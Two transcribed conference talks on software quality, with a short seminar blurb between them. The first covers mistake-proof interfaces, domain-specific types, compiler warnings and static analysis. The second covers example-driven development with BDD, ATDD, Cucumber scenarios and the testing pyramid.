Once you have identified how they could accidentally make mistakes, then what you can say is, all right, how much work would it be for me to change the interface so that the mistake becomes impossible? After you've done that analysis, you're in a position to say, okay, this is how common I think the mistakes are and this is how serious the implications are if the mistakes occur. This is how much work it's going to be for me to change things so that the mistake becomes impossible. Now you can make an engineering judgment to say, is this more important or is this more important? What the right answer is will depend on your particular circumstances. The important thing is to recognize that you have created an interface which could be misused and to ask yourself, could it be revised so that it cannot be misused? The sessions run for an hour at a time, but this is the session right after the lunch break. I'm assuming you've got a heavy meal floating around in your stomach right now. It's a big room. There's lots of people. It's warm. I'm talking about software. This is what we're going to do. We're going to take a break for five minutes right now and it's just going to be five minutes. There's not a lot of room, but you can at least stand up and try to get your blood circulating. Those of you who want to can go and try to get as much caffeine as you can possibly consume in five minutes. We'll start again in five minutes. This is very nice. I've got a drop down. Drop down is very empowering. Makes me feel like I can't possibly choose the incorrect date, except that I chose an incorrect date. It's not fair to pick on Lonely Planet because actually it turns out that Lonely Planet has a wide variety of ways to make mistakes. This is all from Lonely Planet. It turns out that if you want to fly somewhere, you actually don't even have a drop down. All you have is a widget you click on, which is great. It brings up a calendar and you can only choose valid dates. That's wonderful. That works really well. If you want to find a hotel, then all you have is a drop down and a widget. You have a choice as to whether you want to get it right or you want to have the risk of getting it wrong. Speaking of choice, when you want to rent a car, the only possibility is a drop down. Wait. Did I talk about consistency yet? Have I mentioned the importance of consistency? Here we have three essentially identical operations at the same website with three different interfaces. Some of them allowing some kinds of mistakes and other ones not. This is the kind of thing you would like to avoid if you possibly can. Constraining values, such as saying there are only 12 possible month objects. That's a legitimate technique. To be honest, it is not that common to have a relatively restricted universe of values such that you can prevent people from using other possible values. The more general technique is introducing types. I did some work with a company. They make slot machines, these lovely automated things whose sole purpose in life is to separate you from as much money as possible and somehow leave a smile on your face. It's an interesting industry, actually. One of the techniques that they use to make sure that you will keep on playing to lose all of your money is to give you bonus money so you feel like you've gotten money for free. The problem is it's really important to them that the bonus money never leave the machine as real money. The bonus money is only there to keep you playing so you lose more of the real money.
Under those conditions, it makes a lot of sense in their software, and they ultimately did do this. They have a type called something like real money and a type called something like bonus money, and they have various operations for combining them together and adding them and showing totals and stuff, but under no conditions can bonus money ever be converted into real money. As another example, we know from studying engineering and physics that if we have units like time and mass and distance, then you can't arbitrarily combine them. But an awful lot of software that is representing things like time and mass and distance actually only programs in terms of floating point numbers. Maybe they use typedefs or something like that to make them feel better about themselves. What we would like to do is make sure that unit conversion errors are impossible. I'll talk about that a bit more in a moment. First I want to mention everybody's favorite type is string. That's not true. Everybody's favorite type is int. The problem is that int is meaningless. Int means I've got a number, but we don't know what it is. Is it someone's age, a street address, the number of times we've circled the moon? I don't know. It's a number. String is the equivalent thing. If I say I have a string, that is effectively meaningless. You might as well not even be using a type if you say something as type string. A filename, for example, should be different from a customer name, and they should both be different from a regular expression, which really is a different kind of thing. Printer name should be different from driver name. That's not my observation. That is the observation of a client I worked with one time that spent a huge amount of time debugging a problem where driver names and printer names were both represented as strings. They only differed in terms of the last three characters of the name, and debugging that was not terribly pleasant. Since you have different types, if I know I have a customer name, or if I know I have a driver name, or if I know I have a regular expression, or I have an address, once I know what it represents, and that's encoded in the type system, then I can start doing type-specific validation. I can do type-specific printing depending on what it is that I have. If all I have is just a string, and I have no idea what it is, it's essentially useless information. Strings are very convenient, but they don't carry any real type information. I'm advocating the idea that you can eliminate certain kinds of client errors by generating new types. In many cases, the types are going to be written by hand. Under some conditions, you may need to generate the types automatically. This is a case where you can do this using template metaprogramming in C++. As an example, let us suppose what you are dealing with are things like mass, and distance, and time. The normal units that you deal with in physics and engineering applications. The problem that we have is that the number of possible types is, in principle, unlimited. For example, if I have mass and I multiply it by mass, I get a new type, mass squared. Multiply mass by distance and I get another new type. Every combination of units gives me yet another new type, so these are types you really want to generate automatically rather than write by hand. A lot of the things I have just talked about can also be caught by testing, for example, or during debugging.
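The template metaprogramming approach being alluded to can be sketched very roughly like this (my own illustration, assuming C++11; real libraries such as Boost.Units are far more elaborate):

    // Exponents of mass, length and time are carried in the type itself.
    template <int M, int L, int T>
    struct Quantity {
        double value;
    };

    using Mass     = Quantity<1, 0, 0>;
    using Length   = Quantity<0, 1, 0>;
    using Time     = Quantity<0, 0, 1>;
    using Velocity = Quantity<0, 1, -1>;

    // Multiplying two quantities adds the exponents, producing new types on demand.
    template <int M1, int L1, int T1, int M2, int L2, int T2>
    Quantity<M1 + M2, L1 + L2, T1 + T2>
    operator*(Quantity<M1, L1, T1> a, Quantity<M2, L2, T2> b) {
        return { a.value * b.value };
    }

    // Length d{100.0}; Time t{9.58};
    // Mass wrong = d * t;   // would not compile: the exponents don't match Mass

Unit mistakes like the commented-out assignment could, as just noted, also be caught by testing or debugging, but rejecting them at compile time is a form of static analysis, which is the next topic.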
The thing is that static analysis is more reliable because static analysis should not miss any paths. Testing in non-trivial systems is typically not going to be able to cover every single path. Static analysis can analyze them all. Furthermore, static analysis incurs no runtime cost because it occurs prior to runtime. As a result, if you can guarantee that certain conditions cannot occur because static analysis has ruled out the possibility, you can eliminate the runtime checks for those conditions and you can eliminate the error handling code for those conditions. You can make your program a little smaller and a little faster simply by having ruled out the possibility of certain kinds of mistakes. There are a whole bunch of different kinds of static analysis. What I want to do is just introduce you to the variety of forms of static analysis. We're going to start with compiler warnings. Compiler warnings are about the lowest of the low-lying fruit when it comes to static analysis. This is the situation. It is highly likely that compiler writers know the language better than you do. Highly likely that that is true. As a result, you should pay attention to their warnings. It's an interesting thing about compiler writers. In my experience, compiler writers view their job as taking a valid source program and generating the best possible object code from it. That's their job. Their job is not to babysit you and find a lot of mistakes, except for in certain parts of GCC. Generally speaking, they take a valid source program and they produce object code. If they take the time to issue a warning, it is highly likely that it is a relevant warning because, number one, they don't view issuing warnings as their job. Number two, they understand that many of their clients work in an environment where they are required to compile without getting any warnings. If they issue a warning, that means somebody somewhere is going to get really upset and have to change some code. Generally speaking, compiler vendors don't issue a lot of warnings. If they do issue a warning, usually it is meaningful. You should therefore try to compile cleanly at maximum warning level. Actually you should try to require compiling cleanly at maximum warning level, if you can. Not everybody has the luxury of that. At the same time, you do not want to become dependent on compiler warnings, especially in languages like C and C++ with multiple compiler vendors that behave slightly differently. It is possible to find different compilers that warn about different things. Your code can sail through one compiler with no comment at all and get warnings from other compilers. Also different compilers may issue warnings under differing conditions. You don't want to become dependent on the existence of compiler warnings. This is a problem I run into in practice all the time where someone will say, I don't need to remember that because if I make that mistake, the compiler will warn me. Then I have to point out, yes, but I know another compiler that doesn't issue a warning and if you end up porting your code to a different platform, for example, you may run into this problem. So let us look at a really small piece of C code described as an extremely small piece of bad C code. This is from an article from a number of years ago. So here's the code. Under GCC 3.2.3 with the default compiler options, that compiles cleanly. No warnings.
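The code from the slide isn't reproduced in the transcript; a representative snippet of the kind that draws exactly these warnings might look like this (my guess, not necessarily the code from the article; written as C-style code that also compiles as C++):

    #include <cstdio>   // <stdio.h> in the original C

    int f(int x) {
        std::printf("%d %d\n", x);   // the format string wants two arguments, only one supplied
    }                                // control reaches the end of a non-void function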
However, if you turn on full warnings, well, it says, okay, too few arguments for format, control reaches the end of a non-void function, I mean, this is giving you some really useful information. Wouldn't you like to know that you don't have enough arguments in your format specifier? Seems vaguely relevant. All you had to do was ask this particular compiler to tell you the things that it recognized were wrong with your code. So if it's just a matter of enabling a particular command line option, it seems like you definitely would like to be able to do that. It doesn't get a lot easier than that. The next step up after turning on compiler warnings is lint and similar utilities that read through your source code. Now, lint and similar utilities, their only job is to issue warnings. They don't generate object code. So their only reason for existence is to try to find things which might be mistakes. So they check for things like constructs with unexpected behavior. For example, if you test floating point numbers for equality, most people have learned at one point or another that just because I have two mathematical expressions which are mathematically equal does not mean that if I translate that into source code and run it, I'm going to get two bit patterns that are identical, but checking floating point numbers for equality checks the bit patterns. So that's a nasty little trap to fall into as I can testify by the nine hours I spent one time trying to figure out what the problem was. Placing mandatory cleanup in a Java finalizer, for example, if it's mandatory, finalizers in Java aren't always called. So putting mandatory stuff there, bad idea. Potential concurrency problems, for example, invoking thread.run instead of thread.start in Java. In Java Concurrency in Practice, they say that static analysis tools are an effective complement to formal testing and code review. Or potential security risks. For example, requesting read write file access when you only need read only. Making unchecked writes to fixed size buffers. Gary McGraw in the security industry, he says that static analysis is number one of the seven touchpoints of secure software. So it's recognized as being able to find really interesting problems with your code. Couple of other things that can be identified. One of them is unportable code, for example, use of compiler specific extensions or dependencies on evaluation order in languages where the evaluation order is not completely nailed down. Likely maintenance problems like overly complex expressions or failure to follow naming conventions. As I already mentioned, lint-like programs are typically a lot more aggressive than compilers. Traditionally, lint-like programs have required a non-trivial investment up front to get them configured to the point where they can do something useful. Especially for large legacy systems. It's very, very common that if you get a brand new lint-like tool and you deploy it for the very first time and you have a large code base, in many cases you will be inundated with hundreds of thousands of warnings. And you will be trying to figure out, actually you'll be trying to figure out how do I uninstall the static analysis tool because you just can't do anything with hundreds of thousands of warnings. Output filtering helps a lot, but you're going to have to set aside time for initial configuration. Now, this is sort of the traditional path for static analysis tools.
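To pick out just one of the checks listed above, the floating-point equality trap looks innocent enough; this tiny illustration is my own, not from the talk:

    #include <cstdio>

    int main() {
        double d = 0.1 + 0.2;
        if (d == 0.3) {                  // mathematically true, but the bit patterns differ
            std::printf("equal\n");
        } else {                         // this is the branch that actually runs
            std::printf("not equal: %.17g vs %.17g\n", d, 0.3);
        }
    }

A lint-style tool flags the == on floating-point values without ever running the program.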
In the last, let's say, half dozen years, a number of companies have arisen with a different philosophy. Their philosophy has been, we are going to issue almost no warnings unless we are really, really sure that this is a problem. And their goal is to issue almost no false positives. So what they do is they have a very low false positive rate, but they don't catch as many mistakes. And companies that I've talked to that have used both of them have said, well, you know, it's not exactly obvious what the best solution is because these people, whatever they warn about, usually has to be fixed. That's great. But the problem is there's a lot of other stuff that they need to fix that they didn't warn about. And the first set of tools which give more warnings will bring those other things to light. At the same time, there's a ton of payoffs for using these kinds of tools. One of them is reduced debugging time. You have to ask yourself, how long is it going to take me to track down, for example, use of an uninitialized variable? Uninitialized variables are easy to catch with data flow analysis. Tools do it all the time. But if you don't run the tool, you don't necessarily know it's uninitialized. What if you have an evaluation order problem where you think that X and Y are being added before being multiplied by Z, but actually it's in some other order for some reason? Or the order in which operands of a function call were evaluated was different from what you expected? In addition, one of the nice things about using these kinds of tools is that when people use them and get warnings about problems, this helps educate the programmers about the kinds of problems. After you've received a warning six times in a row that if you do this, you could have a problem, we would like to believe you're going to learn you probably should not do that. So it's a way to educate people over time. And by running static analysis tools like Lint, you can identify modules that probably should be looked at more closely either through testing or through general review. And that is because it is an empirical observation that defects in modules tend to cluster, which means that they're not uniformly distributed. If you find a bunch of mistakes in one area, there's probably other mistakes in the same area. So if Lint gives you a whole ton of warnings in one module or two or three files, you should probably be subjecting those files to additional scrutiny because statistically it is likely there are other issues there which require some way of being addressed. There is an interesting thesis that says programmers don't do anything unless they think it will have an effect. It seems reasonable. Programmers don't write code unless they think it's going to do something. So the question is, how can we take advantage of the observation that programmers don't write code unless they think it's going to do something? I will tell you in 20 minutes because that's the time for the break. So we'll start again in 20 minutes. Thank you.
|
Some development practices improve software quality, regardless of the domain of the application, the language in which it's written, the platform on which it runs, or the users it is intended to serve. This seminar explores fundamental principles, practices, and standards that improve software quality, no matter what the software does, how it does it, or whom it does it for. Unlike most treatments of software quality, this seminar focuses on the critical role that programmers play, and it discusses specific strategies applicable to their activities.
|
10.5446/51510 (DOI)
|
Hello, is that better? Okay, great, thank you. Welcome, thanks for coming along. I'm going to be talking about growing software from examples. So this is a session that's come from, I practice BDD using Cucumber as part of my day job. I go in and train people about that. And I'd noticed over time that there are a lot of other techniques out there, ATDD, TDD, specification by example, many other things. And I was wondering to myself, what is it that makes them different? Are they the same? Are there similarities? Should I know more about all the other ones? Should I pitch my training for specific audiences for specific reasons? And so really it's just a question of, you know, what's going on here? Are there many things that we need to learn? Or are there just too many words and names out there? So it didn't actually bother me that much for most of the past couple of years, until I was wandering around on the Internet doing research before one of my engagements. And I came across this document. This is just a part of a document. It's by a guy called Mr. Bradley. And it purported to show you when you should use each of the techniques that I was just describing. It's quite a long document. This is just an excerpt from it. But it had a checklist that was trying to describe what situations specification by example would be useful in, what situations behavior-driven development would be useful in, etc., etc. And it just felt wrong to me. I didn't think that these things were significantly different. I didn't recognize the context that this guy was describing. And in fact, I thought this was a really bad document. I felt very strongly about this. I commented. I wrote to the guy. I haven't actually received a response. But it led me to think more deeply about what this market is about. Why are there so many different terms going around for what seems to be a similar type of activity? Now, like many people, I have read this book by Nat Pryce and Steve Freeman. I wonder if I can get a show of hands. It's really difficult to see. Who's read this book? Okay, a few of you. Maybe I should go back a step. How many developers have I got in the audience? Loads, okay. How many testers have I got? Okay. Welcome. So this book is a book designed, aimed at programmers. It's a book written using a Java application as an example. But it's certainly not a book that's restricted to Java programmers. I've recommended it and given it to C# developers, .NET developers and also C++ developers. And I think I'd go as far as to say that it was the most important book I read in the year that it came out. And it still sits with me as the most important book of the decade that it came out in. It was concise. It was clear. And it showed how you didn't need any of these fancy tools. You didn't need Cucumber. You didn't need BDD. You didn't need new names for things. There were some principles about how you went about developing software: thinking about how it was going to be used, thinking about the low-level architecture of it, which you would design and drive from tests, using meaningful names for tests that were really easy to understand. And all in all, this was a book that actually changed the way I thought about developing software. Just as a little aside as we go in, while I was searching for the image for this book, for the slide, I just went to Google as you do for images. And I found a few other books that are available that also fit in the Goose mold.
This is a wonderful book that prints, people reuse serial packets and they print the book on the side of the serial packet that's blank. There's a Goose book that's about the mafia in Chicago. And there's even a Goose book about doing chemistry experiments in your kitchen. So there's plenty of Goose books. Only one of them is about software development. So one of the diagrams that's in this book is the, you know, it's a classic description of the TDD Red-Green Refactor cycle. Is this familiar to people? Are you all happy with this diagram? Let's have hands if no one's seen it before. Right, so most people have seen this and, you know, it's fairly straightforward. It's part of our TDD way of working. It's been around since XP, if not before that. And we know that we write the test, it fails, we make it pass, and then we refactor or clean up. So what that price in Steve Freeman's book did for me is it introduced the larger loop outside, the loop where you can actually do a failing end-to-end test, or failing acceptance test. And once you've got that acceptance test failing, then you dive down into a lower level loop, the TDD loop, and you go round and round in this way, driving the development of your system from the externally observable behavior of the system, rather than already thinking about the code. Now, this is classic behavior-driven development. This is classic test-driven development. This is common to all of the approaches that I was listing beforehand. We're talking about examples driving out the system from the outside in, from its behavior. And so this is one of the diagrams that we use to try and get this across. When you're thinking about trying to implement something, you don't start thinking about what algorithm you're going to use. You don't start thinking about if and else clauses in the middle of your code. You start thinking about what you need to provide to your end user, to your customer, what the capabilities and the features that you're going to be offering. So you work from outside moving in. And it's also very common to use examples. So all of those mechanisms that I was showing at the beginning use examples. They may call them different things. They may call them tests. They may call them acceptance tests. They may call them specifications. But what they are, they're examples of how the system is going to work. This is a, I lifted this from Brian Marrick's website. Brian Marrick, one of the signatures of the Agile Manifesto, runs a website called exempla.com. And his catchphrase is an example would be handy right about now. So basically it's been recognized for many years that examples are a great way for people to sit and discuss how a system is going to work. And when you sit people around a table and you start coming out with concrete examples, people begin to propose other examples. And it gets them thinking about how the system is going to work. It gets them thinking about edge cases. It gets them thinking about exceptional situations. It gets them thinking about exactly what it is that they're trying to deliver. So, I mean my premise to start with is that all of the techniques or methods work from the outside in. They all use examples and they all write or at least think about the examples before you go about developing the system. So already I'm, you know, you see where I'm coming from. I think these techniques are related if not identical. 
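To make that double loop concrete, here is a minimal JUnit 5 sketch. The basket domain, class names and amounts are all invented for illustration, not taken from the talk's slides. The first test is an outer-loop, acceptance-style example written in terms of externally observable behaviour; the second is the kind of inner-loop unit test you write while driving out the pieces that make the outer example pass.

import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;

// Tiny piece of production code that the examples drive out, kept inline so the sketch is self-contained.
class Basket {
    private int totalInCents = 0;
    void add(int priceInCents) { totalInCents += priceInCents; }
    int totalInCents() { return totalInCents; }
}

// Outer loop: a failing acceptance-style example comes first and describes behaviour, not implementation.
class CheckoutAcceptanceTest {
    @Test
    void customerSeesTheTotalOfEverythingInTheBasket() {
        Basket basket = new Basket();
        basket.add(250);
        basket.add(175);
        assertEquals(425, basket.totalInCents());
    }
}

// Inner loop: ordinary TDD on the units needed to make the outer example pass.
class BasketTest {
    @Test
    void anEmptyBasketTotalsZero() {
        assertEquals(0, new Basket().totalInCents());
    }
}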
So what I'm going to do now is I'm going to go through a number of other examples of things that I think we do when we're developing systems of software using examples. And try and see if there are any differences between the different mechanisms. So I guess the first thing that I want to talk about is the fact that examples, tests, specifications, they're not just throw away things. You don't write them and then forget about them once you develop the system. They're documentation. They're requirements. They're just in time for you to do the development. So the idea is you don't go and write a load of examples three months before you start developing the system and have people sign off on them. You have, you develop these examples as you're doing your discovery, as you're doing the development of your system. So all of the mechanisms, specification by example and ATDD all work in the same way. You pull an example, you discuss it, you maybe get some more examples and these turn into the requirements of your system. And they illustrate the acceptance criteria, the rules, the stories. Another wonderful thing about the examples if you're using Cucumber or JBehaviour Fitness or one of these tools to implement them is that they become living documentation. So one of the real issues that we have in software development with big requirement documents is that they're typically always out of date or wrong. We know as developers that we've often gone back to pieces of code that have comments in them and the comments are no longer true. And that's because the compiler doesn't enforce the correctness of comments. It requires us to update them when we change an API, when we change the name of a method, when we change its arguments. Whereas examples that are executed against your system, they act as a living documentation because they will fail if they are no longer correct. And at that point you know that either your system is broken or your documentation is out of date. So you get some real benefits from having a living documentation that continually affirms that your specifications, your documentation are up to date and correct. Now none of these mechanisms actually mandate you to use any automation tools for running your examples. So this is something you get from using an automation tool such as Cucumber or JBehaviour. However, all of the example mechanisms that we're talking about allow you to write your examples, your specifications using tools of this nature. Another great benefit of discussing these examples among a number of different stakeholders is that you begin to develop ubiquitous language. So ubiquitous language means that we have a way of discussing the domain, the problem domain, that is understood by all of the stakeholders that are participating in the discussion. So in a lot of the techniques, certainly in the BDD and ATDD realms, people will recommend that you have representatives from your test department, representatives from your development department, and representatives of your product, owner or business analyst sitting around together discussing these examples. And while you're doing that, you will have to be communicating on a level that everyone can understand unambiguously. Now this is, already this is a huge benefit that every one of these ways of working delivers. I've lost count of the number of times I've gone into organizations and I find that one group of people uses a word in a different sense from another group of people. 
I was in an insurance company a few months ago and they used the word versions for their sets of rates tables. However, it transpired that as far as the underwriters were concerned, that was a different concept from the concept that the developers had. There turned out to be three different usages of the word versions as applied to rates tables. And every time someone used the word versions, they either assumed they understood the context or they had to then go through another discussion about which sort of versions you're talking about. This sort of thing, if you just write it in a requirements document and pass it to the next person down the line, doesn't surface until much, much later on. If you're all sitting around a table using concrete examples to discuss your requirements, it comes to the surface very quickly and you can arrive at your ubiquitous language, a way of communicating among yourselves within your team in an unambiguous way. I was talking about living documentation. So Matt Wynn, who is one of the authors of the Cucumber tool, has been working on this project called Relish, which takes Cucumber files and publishes them as readable hyperlink documentation. So you can use it as your specification manual. It's presented in a format that is very easy for people to read. And just to demonstrate that it's not just a pipe dream that it's real, you see that this is in fact an example coming off the web. And it's the UK government's digital strategy team who are rewriting the UK government's website. And they have been specifying and implementing this product over the past year and a half in public and it's documented using Cucumber scripts through Relish on the Internet. People often wonder about what sort of examples should we be talking about? You know, am I allowed to use complicated examples? Should everybody be able to understand them? Am I allowed to use concepts about integer overflow in the code or null pointers and so on? And the answer like so many is it depends. It's entirely dependent on the people who are participating in developing those examples, who's going to consume them, who the audience is. So it's down to who's going to be able to read them. It's absolutely fine, I find, for examples to include domain specific terminology. You know, we're not trying to write examples that the man on the street can come in and immediately understand. It's a way for your team to communicate about the requirements of the system that you're developing. So they can be intensely technical as long as the technical barrier is not a barrier to the people on your team. You've got to understand what they're interested in them for. So another problem that people frequently have is that because of these two loops that I described earlier, the outer behavioral loop and the inner TDD loop, people are worried that you're going to get duplication between the TDD loop and the outer loop. Hey, we don't want to test these things twice. And I mean, the first thing to point out is that they're not tests, you know, they're specifications. You're trying to document the system and you're documenting the system for very different purposes. The outer loop, you're trying to document the system so you can talk about its capabilities, about how it's going to work, about what features and capabilities it's going to deliver. The inner loop, you're talking about the technical design, the architecture of the implementation, and they have different audiences. There will be some overlap. 
And I ask people not to concern themselves overly with this. They have different audiences and they have different levels of granularity. The most important thing about the examples is you need to keep them clear. If people can't understand what's being written, if it's not giving them the value from being able to understand what the system does, then you have missed the trick. So when we think about making things clear, this is an example in Java. I'm not going to be showing too many of these, the code level examples, but this is an example where I'm trying to show that you need to emphasize the details that are interesting without overloading people with the details that are just incidental. So we need to make sure that our examples are focused. When someone comes to an example, they need to be able to bring away the information really quickly about what you were trying to show in that example. So here I'm using the builder pattern to create this customer object. Now, a customer is going to be quite a complex beast. It may not just be one class, it may be a graph of linked objects. There could be any sort of implementation underneath this. But when you're reading the example about referral rules around smokers and non-smokers, you're not really interested in the rest of the customer object. You're interested in whether the person was a smoker or not. So what we're doing here is we're creating the data within the example. So that means that when we come to automate it, the data is under our control. We're not dependent on an external database. We're not dependent on a service. We're not dependent on live systems somewhere else. So we create the data. We don't want to burden the person reading this example with loads and loads of incidental details, you know, the customer's name, what his salary is, what his job is. This example is around how we handle smokers when we come to try and quote for their insurance needs. And this example, this builder pattern, makes it very clear what it is we are interested in. So incidental details should be hidden. Non-incidental details should be made very clear. And you have to use your subjective judgment, I guess, about what's incidental in a particular situation. So if we were dealing with zip codes and postage prices, would the actual zip code be important? Or is it which state the zip code relates to that is of interest to the person reading it? So it's about clarity and communication between the stakeholders who are working with these examples. There's also people who come to writing examples from a background in test, and often from development, who have a tendency to write what we call imperative examples, where you talk very much about the interface that you're dealing with and how you manipulate it, or you go through a number of steps and make them very clear in the process. And that leads to scenarios and examples that look a bit like this. So this is written in Cucumber. This is, you know, a typical registration and checkout, a registration for an account on a website. And as you can see, there's a list of different elements in there about following a link, entering data into a box, pressing a button, etc., etc., going on like that. And this is imperative. We're ordering the system about what to do. You do this, you do that, you do the other. And this makes it very brittle.
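Before coming back to that brittleness, here is a minimal Java sketch of the kind of test-data builder just described. The class and field names are invented for illustration; a real customer would obviously carry far more state, and the defaults are there precisely to hide everything that is incidental to the example.

class Customer {
    final String name;
    final boolean smoker;
    Customer(String name, boolean smoker) {
        this.name = name;
        this.smoker = smoker;
    }
}

class CustomerBuilder {
    // Sensible defaults for everything that is incidental to the example.
    private String name = "Any Customer";
    private boolean smoker = false;

    static CustomerBuilder aCustomer() {
        return new CustomerBuilder();
    }

    CustomerBuilder whoSmokes() {
        this.smoker = true;     // the one detail this particular example cares about
        return this;
    }

    Customer build() {
        return new Customer(name, smoker);
    }
}

// Used inside an example, only the interesting detail shows up:
//     Customer customer = CustomerBuilder.aCustomer().whoSmokes().build();
// Name, salary, occupation and the rest stay hidden behind the defaults.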
So if you get, if you change that interface, if you change the way it behaves, then all of your tests that have long lists of things that have to be done have to be revisited and fixed up. So we try and encourage people to work in a more declarative way. So we're looking for scenarios that tell people about the behavior of the system, not about which interactions you're doing with the various UI elements or API parameters. When you're working in declarative way, again, there's more subjective decisions to be made, because, you know, declarative working can go too far. You can get very declarative, and you're not delivering any value to your customers, to the people who are discussing these examples. So this is a perfectly true statement, but it's not giving you any idea about what the system should do, what the behaviors are. Following on from the imperative listing of many, many different actions with your UI or your API, you get the workflow style. So this happens often when people go to manual tests and try to turn them into examples of how the system should behave. So if you look in your quality center, if your manual test is used quality center, you'll see lists of steps about what the testers need to do to test a particular scenario to reproduce something. And this will be a workflow much in the nature of this, where you, oh, I'm going to go to home page, I'm going to log in, I'm going to put something in my basket, and then I'm going to check out, and then I should check that my purchase details are confirmed. And, you know, this is a long list of things, and this is a workflow that, again, is very brittle and is totally dependent on the way your system is strung together. And when you start changing that, these workflow style scenarios start breaking. These are very important system tests, okay? So there's a place in your system, in your set of examples, for some workflow scenarios. Because, of course, you want to test that all of your components hang together. You do want to test the happy path through your system. You want to make sure that people can actually log in, add items to the basket, check out and get things delivered. But you don't need very many of these. And I'll be revisiting that statement a little bit later on. In general, more of your examples should focus on a single behavior. So this is an example I was talking about earlier, which is to do with the, you know, with the postage price for a particular state in the United States. So here, we're focusing on a single behavior. There's no information here about logging in, adding things to your basket, clicking a checkout link. Because this example is not about that. This example is about calculating the postage for sending something that you bought to Alaska. The first line statement there, the given I am on the checkout page. So I had a discussion about whether you actually need that. But if we are going to have to write the scenario in this format, what's going on behind that given statement is probably all of the things that I just described. It will log in as a registered user, add an item to the basket, say I want it to deliver to Alaska and go to the checkout page. And then the then statement checks that we have the correct postal charge. So we have an example there that does an awful lot of things behind the scenes. It may go through the UI. It may not. It may set up the state of the system using some in-memory object. We have no idea. 
But what we do know for sure is that it is exercising a particular behavior of the postal charge system. And that's what's important about this example. And it's been made very clear. And if we change the way we implement all of the other parts of the process, the logging in and checking and putting things into baskets, all we have to do is change the implementation of the single given I am on the checkout page statement rather than go through each of our examples refactoring them. And another thing that I think is common across all of these example-based mechanisms is that we have to realize that all tests have a cost. There are benefits from having tests, from having examples. There are benefits from automating those examples, but we must understand that there are going to be costs to automating our examples. And sometimes those costs are not justifiable. So we need to look at our examples, not necessarily on a case by case basis, but we certainly need to think about whether there's enough benefit to carry the burden of writing those examples in the first place, automating them, and then maintaining them. I've got the statement there, remove unnecessary examples. So do we really need an example? How many examples do we need? So Matt likes to think about your set of examples being a tent with lots of guy ropes. So your system is the tent and the guy ropes are the tests or the examples that demonstrate how it works. You don't need to have millions and millions of guy ropes. You need enough guy ropes to make sure the tent doesn't blow away. I was looking at a piece of software where someone was writing conversion code that converted from Roman numerals into decimal. And it looked, it was a kind of odd piece of code in the first place. But it looked like the examples that were driving it were fairly reasonable. And it was in .NET and I was looking at it in Visual Studio. And I suddenly realized that it was a templatized test case. And that it only looked reasonable because the region that specified all the template instantiations had been collapsed. When I uncollapsed it, it turned out that there was a test case for every single Roman number between 1 and 3999. Now, at this point, you can ask yourself: that was certainly an exhaustive set of tests, but was it necessary? If you were writing those tests for an enterprise system and you started writing test cases for every length of user name or customer name, for instance, or can I check out every single different item that's in our inventory, you would soon get bogged down. So you need to obviously use judgment. So when thinking about the cost and benefit of tests, it's helpful, like in so many domains, to divide it up into a quadrant. So we have benefits or risk going up the y-axis, and we've got the cost of implementing the test along the x-axis. So I would suggest that if it's really expensive to automate these tests and the benefit or the risk that you perceive from this part of the system failing is low, then it's probably not worth implementing those as automated tests. However, if the cost is low and the risk is high, absolutely a lot of value in having automated examples there. Low cost, low risk, that's your bread and butter, these are your unit tests, your component tests, these are the things that you use to drive out the system.
And if you have expensive to maintain and implement examples, but you have high risk of the system failing, this is the area where you need to consider what infrastructure you need to put in place to make it easier to maintain and write those examples. So this is, there's, in a system you often have an external facing UI, you may have an API if you're offering up a service of some sort or a library, and people often think about acceptance tests as invoking the whole of the application, the whole of the system that you're delivering. So you will frequently see tests that start at the UI, go through all the way to the database, and then all the way back up again, and you will check what's going on in the UI to make sure that everything worked. And in the same way that I was talking about workflow tests being useful from time to time, those sort of tests are also useful as system tests. The trouble with this is that they're generally slow, they're costly to set up, and they're often brittle because they're using a lot of the interactions between your system and other systems on the network, other subsystems, they may be using databases, they may be using the file system. The UI as well is a component that tends to change frequently. So this point here is again common across the board. We need to focus on examples that are understandable to our stakeholders, but we need to make sure that when we come to automate those examples, we don't immediately think that we have to test the whole system. So many of these tests, many of these examples can be automated using just slices of the system, a small subset of the components. And related to that, even when you're exercising the UI, it's really valuable to remember that the UI itself is a component. So when you're designing your system, you're implementing it, consider that you want to exercise the UI without creating the whole of the rest of the application. Think about a faked business layer so that you can create those situations that are hard to create if you were using a real business layer such as timeouts, network disruptions, etc. And equally, you can provide data that you have, you can data, faked data, data that fits the behavior that you want to experiment with and describe. So I would say that this is one of the most important things that gets missed so often. We get very top-heavy tests which always go through the UI all the way to the database, and we get no tests of the UI in isolation. Essentially, even on good tests, in good sets of tests, you end up with a lot of component tests, but as soon as people want to write, automate examples that interact with the UI, you then have full system tests. This leads to big, slow and brittle test harnesses. So I feel at this point I should introduce the testing pyramid, which I'm sure many of you have seen. And this emphasizes what I'm talking about. The smaller, the finer the granularity of the test, the smaller the component that we're exercising, the more tests we would expect to see. So at the bottom, this bottom slice would typically be unit tests. We're thinking about the tests that our developers write. In the middle, we may typically be thinking about component tests, interaction tests that developers might write. These may also be automated examples that we develop with our business. Right at the top, we have end-to-end system tests. So this diagram often gets shown with this top part of the diagram being called UI tests. But I think that confuses matters. 
What we're really talking about is how much of the system are we exercising? How thick is that stack? And end-to-end tests is about as thick as it can get. It's because you're testing the whole of the system. And not to be forgotten is right at the top of this pyramid, there's always a cloud. And we know clouds rain. And you can never get away from the fact that there has to be some manual testing. Exploratory testing isn't part of the rain cloud. It's part of the manual process, but it's entirely essential. So many organizations come to BDD and the other mechanisms from a background of we want to speed up our automated regression testing. And although that is a side effect of automating your examples, it's certainly not the primary goal. And even if you can translate most of your requirements into automatable examples, you'll still need exploratory testing. And it's a great skill that needs to be developed in your testers. And I recommend a book by Elizabeth Hengenson that came out, I think, last year called Explore It. Now, it's all very well-seeing that this is the structure, this is the layout of tests that you should be aspiring to. But most systems make it very, very hard to write your tests, to automate your examples in that way. And the problem is that we haven't architected and designed our systems to be able to swap in and out at layers. We haven't built seams into our systems. So Michael Feathers, who's been working in this area for many years, wrote a book called Working Effectively with Legacy Code. And he talks about refactoring legacy code to provide seams where you can decouple parts of the system from the rest of the system, allowing you to inject fakes or mock objects to allow you to write tests against those subsystems. And at that point, you think to yourself, well, okay, how am I going to go about doing this? Because most of us will be working on legacy systems. So how many of you think that you're working on a legacy system? How many of you have got unit tests that cover your system adequately? Right, okay. So there's a big discrepancy there. And the real challenge that many organizations face is moving from a situation where you have a system that is essentially untestable to a system that is testable. And for any of my advice about writing examples that only excise parts of your system to be applicable, you have to actually start refactoring your system to decouple the major components of it from each other. So that's probably out with the scope of today's session. 